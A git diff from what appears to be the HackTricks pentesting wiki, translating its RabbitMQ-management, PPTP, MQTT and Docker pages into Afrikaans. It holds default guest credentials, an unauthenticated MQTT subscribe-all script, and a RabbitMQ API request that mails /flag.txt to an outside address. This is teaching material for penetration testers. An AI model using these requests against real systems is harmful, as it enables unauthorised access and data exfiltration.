-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hackingsloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en mondelinge Pools vereis_). {% embed url="https://www.stmcyber.com/careers" %} -## Basic Information +## Basiese Inligting -You can learn more about RabbitMQ in [**5671,5672 - Pentesting AMQP**](5671-5672-pentesting-amqp.md).\ -In this port you may find the RabbitMQ Management web console if the [management plugin](https://www.rabbitmq.com/management.html) is enabled.\ -The main page should looks like this: +Jy kan meer oor RabbitMQ leer in [**5671,5672 - Pentesting AMQP**](5671-5672-pentesting-amqp.md).\ +In hierdie poort kan jy die RabbitMQ-bestuurswebkonsol vind as die [bestuursprop](https://www.rabbitmq.com/management.html) geaktiveer is.\ +Die hoofbladsy moet so lyk: ![](<../.gitbook/assets/image (270).png>) -## Enumeration +## Enumerasie -The default credentials are "_**guest**_":"_**guest**_". If they aren't working you may try to [**brute-force the login**](../generic-methodologies-and-resources/brute-force.md#http-post-form). - -To manually start this module you need to execute: +Die verstekgeloofsbriewe is "_**guest**_":"_**guest**_". As dit nie werk nie, kan jy probeer om die aanmelding [**brute force**](../generic-methodologies-and-resources/brute-force.md#http-post-form). +Om hierdie module handmatig te begin, moet jy uitvoer: ``` rabbitmq-plugins enable rabbitmq_management service rabbitmq-server restart ``` - -Once you have correctly authenticated you will see the admin console: +Sodra jy korrek geïdentifiseer is, sal jy die administratiewe konsole sien: ![](<../.gitbook/assets/image (271) (1).png>) -Also, if you have valid credentials you may find interesting the information of `http://localhost:15672/api/connections` - -Note also that it's possible to **publish data inside a queue** using the API of this service with a request like: +As jy geldige geloofsbriewe het, sal jy dalk die inligting van `http://localhost:15672/api/connections` interessant vind. +Let ook daarop dat dit moontlik is om **data binne 'n waglyn te publiseer** deur die API van hierdie diens te gebruik met 'n versoek soos: ```bash POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 Host: 172.32.56.72:15672 @@ -57,27 +54,26 @@ Content-Length: 267 {"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"} ``` - ### Shodan * `port:15672 http` -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in **hacking loopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiend in Pools skriftelik en mondeling vereis_). {% embed url="https://www.stmcyber.com/careers" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/network-services-pentesting/1723-pentesting-pptp.md b/network-services-pentesting/1723-pentesting-pptp.md index 7daf02ba5..5a49abcdd 100644 --- a/network-services-pentesting/1723-pentesting-pptp.md +++ b/network-services-pentesting/1723-pentesting-pptp.md @@ -2,46 +2,44 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -**Point-to-Point Tunneling Protocol (PPTP)** is a method widely employed for **remote access** to mobile devices. It utilizes **TCP port 1723** for the exchange of keys, while **IP protocol 47** (Generic Routing Encapsulation, or **GRE**), is used to encrypt the data that is transmitted between peers. This setup is crucial for establishing a secure communication channel over the internet, ensuring that the data exchanged remains confidential and protected from unauthorized access. +**Point-to-Point Tunneling Protocol (PPTP)** is 'n metode wat wyd gebruik word vir **afstandsbediening** van mobiele toestelle. Dit maak gebruik van **TCP-poort 1723** vir die uitruil van sleutels, terwyl **IP-protokol 47** (Generic Routing Encapsulation, of **GRE**), gebruik word om die data wat tussen eweknieë oorgedra word, te versleutel. Hierdie opset is noodsaaklik vir die vestiging van 'n veilige kommunikasiekanaal oor die internet, om te verseker dat die uitgeruilde data vertroulik bly en teen ongemagtigde toegang beskerm word. -**Default Port**:1723 - -## Enumeration +**Verstekpoort**: 1723 +## Enumerasie ```bash nmap –Pn -sSV -p1723 ``` - ### [Brute Force](../generic-methodologies-and-resources/brute-force.md#pptp) -## Vulnerabilities +## Kwesbaarhede * [https://www.schneier.com/academic/pptp/](https://www.schneier.com/academic/pptp/) * [https://github.com/moxie0/chapcrack](https://github.com/moxie0/chapcrack)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md b/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md index 96ca7e0ee..f8d7a9993 100644 --- a/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md +++ b/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md @@ -2,69 +2,60 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -**MQ Telemetry Transport (MQTT)** is known as a **publish/subscribe messaging protocol** that stands out for its extreme simplicity and lightness. This protocol is specifically tailored for environments where devices have limited capabilities and operate over networks that are characterized by low bandwidth, high latency, or unreliable connections. The core objectives of MQTT include minimizing the usage of network bandwidth and reducing the demand on device resources. Additionally, it aims to maintain reliable communication and provide a certain level of delivery assurance. These goals make MQTT exceptionally suitable for the burgeoning field of **machine-to-machine (M2M) communication** and the **Internet of Things (IoT)**, where it's essential to connect a myriad of devices efficiently. Moreover, MQTT is highly beneficial for mobile applications, where conserving bandwidth and battery life is crucial. - -**Default port:** 1883 +**MQ Telemetry Transport (MQTT)** staan bekend as 'n **uitgee/inteken-boodskapprotokol** wat uitstaan vir sy buitengewone eenvoud en ligtheid. Hierdie protokol is spesifiek ontwerp vir omgewings waar toestelle beperkte vermoëns het en oor netwerke werk wat gekenmerk word deur lae bandwydte, hoë latentie of onbetroubare verbindinge. Die kerndoelwitte van MQTT sluit in die minimalisering van die gebruik van netwerkbandwydte en die vermindering van die vraag na toestelhulpbronne. Daarbenewens streef dit daarna om betroubare kommunikasie te handhaaf en 'n sekere vlak van afleweringsversekering te bied. Hierdie doelwitte maak MQTT uiters geskik vir die groeiende veld van **masjien-tot-masjien (M2M) kommunikasie** en die **Internet of Things (IoT)**, waar dit noodsaaklik is om 'n magdom toestelle doeltreffend te koppel. Verder is MQTT baie voordelig vir mobiele toepassings, waar die besparing van bandwydte en batterylewe van kritieke belang is. +**Verstekpoort:** 1883 ``` PORT STATE SERVICE REASON 1883/tcp open mosquitto version 1.4.8 syn-ack ``` +## Inspekteer die verkeer -## Inspecting the traffic - -hen a **CONNECT** packet is received by MQTT brokers, a **CONNACK** packet is sent back. This packet contains a return code which is crucial for understanding the connection status. A return code of **0x00** means that the credentials have been accepted, signifying a successful connection. On the other hand, a return code of **0x05** signals that the credentials are invalid, thus preventing the connection. - -For instance, if the broker rejects the connection due to invalid credentials, the scenario would look something like this: +Wanneer 'n **CONNECT** pakkie ontvang word deur MQTT makelaars, word 'n **CONNACK** pakkie teruggestuur. Hierdie pakkie bevat 'n terugvoerkode wat noodsaaklik is vir die verstaan van die verbindingsstatus. 'n Terugvoerkode van **0x00** beteken dat die geloofsbriewe aanvaar is, wat 'n suksesvolle verbinding aandui. Aan die ander kant, 'n terugvoerkode van **0x05** dui daarop dat die geloofsbriewe ongeldig is en dus die verbinding verhoed. +Byvoorbeeld, as die makelaar die verbinding verwerp as gevolg van ongeldige geloofsbriewe, sal die scenario soos volg lyk: ``` { - "returnCode": "0x05", - "description": "Connection Refused, not authorized" +"returnCode": "0x05", +"description": "Connection Refused, not authorized" } ``` - ![](<../.gitbook/assets/image (645) (1).png>) ### [**Brute-Force MQTT**](../generic-methodologies-and-resources/brute-force.md#mqtt) ## Pentesting MQTT -**Authentication is totally optional** and even if authentication is being performed, **encryption is not used by default** (credentials are sent in clear text). MITM attacks can still be executed to steal passwords. - -To connect to a MQTT service you can use: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) and subscribe yourself to all the topics doing: +**Verifikasie is heeltemal opsioneel** en selfs as verifikasie uitgevoer word, **word versleuteling nie standaard gebruik nie** (legitimasie-inligting word in duidelike teks gestuur). MITM-aanvalle kan steeds uitgevoer word om wagwoorde te steel. +Om met 'n MQTT-diens te verbind, kan jy gebruik maak van: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) en skryf jouself in vir alle onderwerpe deur die volgende te doen: ``` > connect (NOTICE that you need to indicate before this the params of the connection, by default 127.0.0.1:1883) > subscribe "#" 1 > subscribe "$SYS/#" ``` +Jy kan ook gebruik maak van [**https://github.com/akamai-threat-research/mqtt-pwn**](https://github.com/akamai-threat-research/mqtt-pwn) -You could also use [**https://github.com/akamai-threat-research/mqtt-pwn**](https://github.com/akamai-threat-research/mqtt-pwn) - -You can also use: - +Jy kan ook gebruik maak van: ```bash apt-get install mosquitto mosquitto-clients mosquitto_sub -t 'test/topic' -v #Subscriribe to 'test/topic' ``` - -Or you could **run this code to try to connect to a MQTT service without authentication, subscribe to every topic and listen them**: - +Of jy kan **hierdie kode uitvoer om te probeer om aan te sluit by 'n MQTT-diens sonder verifikasie, inteken op elke onderwerp en na hulle luister**: ```python #This is a modified version of https://github.com/Warflop/IOT-MQTT-Exploit/blob/master/mqtt.py import paho.mqtt.client as mqtt @@ -75,61 +66,60 @@ HOST = "127.0.0.1" PORT = 1883 def on_connect(client, userdata, flags, rc): - client.subscribe('#', qos=1) - client.subscribe('$SYS/#') +client.subscribe('#', qos=1) +client.subscribe('$SYS/#') def on_message(client, userdata, message): - print('Topic: %s | QOS: %s | Message: %s' % (message.topic, message.qos, message.payload)) +print('Topic: %s | QOS: %s | Message: %s' % (message.topic, message.qos, message.payload)) def main(): - client = mqtt.Client() - client.on_connect = on_connect - client.on_message = on_message - client.connect(HOST, PORT) - client.loop_start() - #time.sleep(10) - #client.loop_stop() +client = mqtt.Client() +client.on_connect = on_connect +client.on_message = on_message +client.connect(HOST, PORT) +client.loop_start() +#time.sleep(10) +#client.loop_stop() if __name__ == "__main__": - main() +main() ``` +## Meer inligting -## More information +vanaf hier: [https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b) -from here: [https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b) +### Die Publiseer/Inteken Patroon -### The Publish/Subscribe Pattern +Die publiseer/inteken model bestaan uit: -The publish/subscribe model is composed of: +* **Uitgewer**: publiseer 'n boodskap na een (of baie) onderwerp(e) in die makelaar. +* **Intekenaar**: teken in op een (of baie) onderwerp(e) in die makelaar en ontvang al die boodskappe wat van die uitgewer gestuur word. +* **Makelaar**: roeteer al die boodskappe van die uitgewers na die intekenaars. +* **Onderwerp**: bestaan uit een of meer vlakke wat deur 'n skuinstreep geskei word (bv., /smartshouse/livingroom/temperature). -* **Publisher**: publishes a message to one (or many) topic(s) in the broker. -* **Subscriber**: subscribes to one (or many) topic(s) in the broker and receives all the messages sent from the publisher. -* **Broker**: routes all the messages from the publishers to the subscribers. -* **Topic**: consists of one or more levels that are separated by a a forward slash (e.g., /smartshouse/livingroom/temperature). +### Pakketformaat -### Packet Format - -Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header +Elke MQTT-pakket bevat 'n vaste kop (Figuur 02).Figuur 02: Vaste Kop ![https://miro.medium.com/max/838/1\*k6RkAHEk0576geQGUcKSTA.png](https://miro.medium.com/max/838/1\*k6RkAHEk0576geQGUcKSTA.png) -### Packet Types +### Pakket Tipes -* CONNECT (1): Initiated by the client to request a connection to the server. -* CONNACK (2): The server's acknowledgment of a successful connection. -* PUBLISH (3): Used to send a message from the client to the server or vice versa. -* PUBACK (4): Acknowledgment of a PUBLISH packet. -* PUBREC (5): Part of a message delivery protocol ensuring the message is received. -* PUBREL (6): Further assurance in message delivery, indicating a message release. -* PUBCOMP (7): Final part of the message delivery protocol, indicating completion. -* SUBSCRIBE (8): A client's request to listen for messages from a topic. -* SUBACK (9): The server's acknowledgment of a SUBSCRIBE request. -* UNSUBSCRIBE (10): A client's request to stop receiving messages from a topic. -* UNSUBACK (11): The server's response to an UNSUBSCRIBE request. -* PINGREQ (12): A heartbeat message sent by the client. -* PINGRESP (13): Server's response to the heartbeat message. -* DISCONNECT (14): Initiated by the client to terminate the connection. -* Two values, 0 and 15, are marked as reserved and their use is forbidden. +* CONNECT (1): Geinisieer deur die kliënt om 'n verbinding met die bediener aan te vra. +* CONNACK (2): Die bediener se erkenning van 'n suksesvolle verbinding. +* PUBLISH (3): Gebruik om 'n boodskap van die kliënt na die bediener of omgekeerd te stuur. +* PUBACK (4): Erkenning van 'n PUBLISH-pakket. +* PUBREC (5): Deel van 'n boodskap afleweringsprotokol om te verseker dat die boodskap ontvang word. +* PUBREL (6): Verdere versekering in boodskap aflewering, wat 'n boodskap vrystelling aandui. +* PUBCOMP (7): Finale deel van die boodskap afleweringsprotokol, wat voltooiing aandui. +* SUBSCRIBE (8): 'n Kliënt se versoek om na boodskappe van 'n onderwerp te luister. +* SUBACK (9): Die bediener se erkenning van 'n SUBSCRIBE versoek. +* UNSUBSCRIBE (10): 'n Kliënt se versoek om op te hou om boodskappe van 'n onderwerp te ontvang. +* UNSUBACK (11): Die bediener se reaksie op 'n UNSUBSCRIBE versoek. +* PINGREQ (12): 'n Hartklopboodskap wat deur die kliënt gestuur word. +* PINGRESP (13): Die bediener se reaksie op die hartklopboodskap. +* DISCONNECT (14): Geinisieer deur die kliënt om die verbinding te beëindig. +* Twee waardes, 0 en 15, word as voorbehou gemerk en hul gebruik is verbode. ## Shodan @@ -138,14 +128,14 @@ Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/network-services-pentesting/2375-pentesting-docker.md b/network-services-pentesting/2375-pentesting-docker.md index 18dfc2dae..94686f5ba 100644 --- a/network-services-pentesting/2375-pentesting-docker.md +++ b/network-services-pentesting/2375-pentesting-docker.md @@ -1,34 +1,32 @@ -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Docker Basics +## Docker Basiese Beginsels -### What is +### Wat is -Docker is the **forefront platform** in the **containerization industry**, spearheading **continuous innovation**. It facilitates the effortless creation and distribution of applications, spanning from **traditional to futuristic**, and assures their **secure deployment** across diverse environments. +Docker is die **voorste platform** in die **kontenerisasie-industrie**, wat **voortdurende innovasie** aanvoer. Dit maak die moeiteloos skep en verspreiding van toepassings moontlik, wat strek van **tradisioneel tot futuristies**, en verseker hul **veilige implementering** oor diverse omgewings. -### Basic docker architecture +### Basiese Docker-argitektuur -- **[containerd](http://containerd.io)**: This is a **core runtime** for containers, tasked with the comprehensive **management of a container's lifecycle**. This involves handling **image transfer and storage**, in addition to overseeing the **execution, monitoring, and networking** of containers. **More detailed insights** on containerd are **further explored**. -- The **container-shim** plays a critical role as an **intermediary** in the handling of **headless containers**, seamlessly taking over from **runc** after the containers are initialized. -- **[runc](http://runc.io)**: Esteemed for its **lightweight and universal container runtime** capabilities, runc is aligned with the **OCI standard**. It is used by containerd to **start and manage containers** according to the **OCI guidelines**, having evolved from the original **libcontainer**. -- **[grpc](http://www.grpc.io)** is essential for **facilitating communication** between containerd and the **docker-engine**, ensuring **efficient interaction**. -- The **[OCI](https://www.opencontainers.org)** is pivotal in maintaining the **OCI specifications** for runtime and images, with the latest Docker versions being **compliant with both the OCI image and runtime** standards. - -### Basic commands +- **[containerd](http://containerd.io)**: Dit is 'n **kernuitvoering** vir kontenere, belas met die omvattende **bestuur van 'n konteiner se lewensiklus**. Dit behels die hantering van **beeldoorplasing en -stoor**, sowel as die toesig oor die **uitvoering, monitering en netwerking** van kontenere. **Meer gedetailleerde insigte** oor containerd word **verder ondersoek**. +- Die **kontainer-shim** speel 'n kritieke rol as 'n **tussenganger** in die hantering van **koplose kontenere**, wat naadloos oorneem vanaf **runc** nadat die kontenere geïnisialiseer is. +- **[runc](http://runc.io)**: Gewaardeer vir sy **liggewig en universele konteineruitvoering**-vermoëns, is runc in lyn met die **OCI-standaard**. Dit word deur containerd gebruik om kontenere **te begin en te bestuur** volgens die **OCI-riglyne**, en het ontwikkel vanuit die oorspronklike **libcontainer**. +- **[grpc](http://www.grpc.io)** is noodsaaklik vir die **fasilitering van kommunikasie** tussen containerd en die **docker-engine**, wat **doeltreffende interaksie** verseker. +- Die **[OCI](https://www.opencontainers.org)** is van kardinale belang om die **OCI-spesifikasies** vir uitvoering en beelde te handhaaf, met die nuutste Docker-weergawes wat **voldoen aan beide die OCI-beeld en -uitvoering**-standaarde. +### Basiese opdragte ```bash docker version #Get version of docker client, API, engine, containerd, runc, docker-init docker info #Get more infomarion about docker settings @@ -51,21 +49,18 @@ docker system prune -a # - all images without at least one container associated to them # - all build cache ``` - ### Containerd -**Containerd** was specifically developed to serve the needs of container platforms like **Docker and Kubernetes**, among others. It aims to **simplify the execution of containers** across various operating systems, including Linux, Windows, Solaris, and more, by abstracting operating system-specific functionality and system calls. The goal of Containerd is to include only the essential features required by its users, striving to omit unnecessary components. However, achieving this goal completely is acknowledged as challenging. - -A key design decision is that **Containerd does not handle networking**. Networking is considered a critical element in distributed systems, with complexities such as Software Defined Networking (SDN) and service discovery that vary significantly from one platform to another. Therefore, Containerd leaves networking aspects to be managed by the platforms it supports. - -While **Docker utilizes Containerd** to run containers, it's important to note that Containerd only supports a subset of Docker's functionalities. Specifically, Containerd lacks the network management capabilities present in Docker and does not support the creation of Docker swarms directly. This distinction highlights Containerd's focused role as a container runtime environment, delegating more specialized functionalities to the platforms it integrates with. +**Containerd** is spesifiek ontwikkel om te voldoen aan die behoeftes van houerplatforms soos **Docker en Kubernetes**, onder andere. Dit streef daarna om die uitvoering van houers te **vereenvoudig oor verskillende bedryfstelsels**, insluitend Linux, Windows, Solaris, en meer, deur bedryfstelsel-spesifieke funksionaliteit en stelseloproepe te abstraheer. Die doel van Containerd is om slegs die noodsaaklike funksies wat deur sy gebruikers vereis word, in te sluit, en om onnodige komponente uit te sluit. Dit word egter erken as 'n uitdagende taak om hierdie doel volledig te bereik. +'n Sleutelontwerpbepaling is dat **Containerd nie netwerkhantering hanteer nie**. Netwerking word beskou as 'n kritieke element in verspreide stelsels, met kompleksiteite soos Software Defined Networking (SDN) en diensontdekking wat aansienlik verskil van die een platform tot die ander. Daarom laat Containerd die netwerkaspekte oor aan die platforms wat dit ondersteun. +Terwyl **Docker Containerd gebruik** om houers uit te voer, is dit belangrik om te let dat Containerd slegs 'n subset van Docker se funksionaliteite ondersteun. Spesifiek ontbreek Containerd die netwerkbestuursmoontlikhede wat in Docker teenwoordig is, en ondersteun dit nie die direkte skepping van Docker-swerm nie. Hierdie onderskeid beklemtoon Containerd se gefokusde rol as 'n houer-uitvoeringsomgewing, wat meer gespesialiseerde funksionaliteite oorlaat aan die platforms waarmee dit integreer. ```bash #Containerd CLI ctr images pull --skip-verify --plain-http registry:5000/alpine:latest #Get image ctr images list #List images -ctr container create registry:5000/alpine:latest alpine #Create container called alpine +ctr container create registry:5000/alpine:latest alpine #Create container called alpine ctr container list #List containers ctr container info #Get container info ctr task start #You are given a shell inside of it @@ -76,26 +71,24 @@ ctr tasks resume #Resume cotainer ctr task kill -s SIGKILL #Stop running container ctr container delete ``` - ### Podman -**Podman** is an open-source container engine that adheres to the [Open Container Initiative (OCI) standards](https://github.com/opencontainers), developed and maintained by Red Hat. It stands out from Docker with several distinct features, notably its **daemonless architecture** and support for **rootless containers**, 